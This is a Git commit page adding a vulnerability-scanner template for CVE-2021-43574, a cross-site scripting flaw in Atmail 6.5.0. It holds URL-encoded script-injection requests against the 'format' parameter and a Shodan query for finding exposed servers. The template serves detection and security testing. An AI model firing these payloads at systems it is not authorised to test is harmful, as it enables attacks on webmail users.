Merge pull request #5276 from arafatansari/patch-79

Create CVE-2021-43574.yaml
patch-1
Prince Chaddha 2022-09-01 16:37:09 +05:30 committed by GitHub
commit b1e2000759
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 43 additions and 0 deletions

View File

@ -0,0 +1,43 @@
id: CVE-2021-43574
info:
name: Atmail Hosting Webserver 6.5.0 - Cross-site scripting
author: arafatansari,ritikchaddha
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in sites using outdated Atmail hosting version 6.5.0 allows remote attackers to inject arbitrary web script or HTML via the “format” parameter
reference:
- https://medium.com/@bhattronit96/cve-2021-43574-696041dcab9e
- https://nvd.nist.gov/vuln/detail/CVE-2021-43574
classification:
cve-id: CVE-2021-43574
metadata:
verified: true
shodan-query: http.html:"Powered by Atmail"
tags: cve,cve2021,atmail,xss
requests:
- method: GET
path:
- "{{BaseURL}}/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
- "{{BaseURL}}/atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
- "{{BaseURL}}/atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>" does not exist'
- type: word
part: header
words:
- text/html
- type: status
status:
- 500
- 403
condition: or